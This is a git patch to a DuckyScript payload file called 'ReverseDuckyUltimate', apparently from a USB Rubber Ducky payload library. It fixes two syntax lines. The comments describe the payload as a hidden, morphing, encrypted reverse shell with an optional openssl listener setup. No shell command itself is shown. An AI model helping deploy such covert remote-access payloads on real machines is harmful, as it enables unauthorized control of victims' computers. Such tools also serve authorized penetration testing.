From fe91b9824d6376be726e25c2d3d1f182085862a3 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Thu, 16 Mar 2023 12:53:20 +0100 Subject: [PATCH] Updated forgotten IF_DEFINED_TRUE Added IF_DEFINED_TRUE in line 140 deleted the additional EXTENSION string --- .../library/remote_access/ReverseDuckyUltimate/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt index 155de38..c2e22d9 100644 --- a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt +++ b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt @@ -6,7 +6,7 @@ REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed. REM Extension PASSIVE_WINDOWS_DETECT by Korben for best and fastest deployment with guard rails -EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT +EXTENSION PASSIVE_WINDOWS_DETECT REM VERSION 1.1 REM AUTHOR: Korben @@ -137,7 +137,7 @@ REM Automatic setup requires openssl! DEFINE #SETUP FALSE REM Automatic setup and start listener - Requires openssl! -IF_DEFINED #SETUP +IF_DEFINED_TRUE #SETUP IF ($_OS == #NOT_WINDOWS) THEN DELAY 1500 STRINGLN echo "Setting up Infrastructre - Do not interact!"